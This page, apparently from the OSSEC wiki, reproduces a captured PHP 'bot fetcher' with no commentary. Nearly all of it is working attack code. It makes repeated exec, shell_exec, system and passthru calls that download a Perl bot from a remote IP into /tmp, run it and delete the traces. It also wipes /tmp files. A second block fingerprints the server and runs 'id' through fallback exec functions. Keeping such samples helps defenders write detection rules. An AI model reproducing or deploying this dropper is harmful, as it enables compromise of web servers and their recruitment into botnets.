From OSSEC Wiki
id.txt - Bot fetcher
shell_exec("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt");
shell_exec('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;GET http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('rm -rf /tmp/*');
shell_exec('rm -rf /tmp/*.txt');
shell_exec('rm -rf /tmp/*.txt*');
shell_exec('rm -rf /tmp/*.txt.*');
passthru("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt");
passthru('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;GET http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('rm -rf /tmp/*');
passthru('rm -rf /tmp/*.txt');
passthru('rm -rf /tmp/*.txt*');
passthru('rm -rf /tmp/*.txt.*');
exec("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt);
exec('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;GET http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('rm -rf /tmp/*');
exec('rm -rf /tmp/*.txt');
exec('rm -rf /tmp/*.txt*');
exec('rm -rf /tmp/*.txt.*');
system("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt");
system('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;GET http://ehost/~x/sela.txt;perl sela.txt;rm -rf sela.txt');
system('rm -rf /tmp/*');
system('rm -rf /tmp/*.txt');
system('rm -rf /tmp/*.txt*');
system('rm -rf /tmp/*.txt.*');
?>
<?
$dir = @getcwd();
$ker = @php_uname();
$disablefunc = @ini_get("disable_functions");
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "Free:".view_size($free)."<br>";
echo 'Calkowita:'.view_size($all).'<br>';
echo 'Funkcje:'.$disablefunc.'<br>';
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}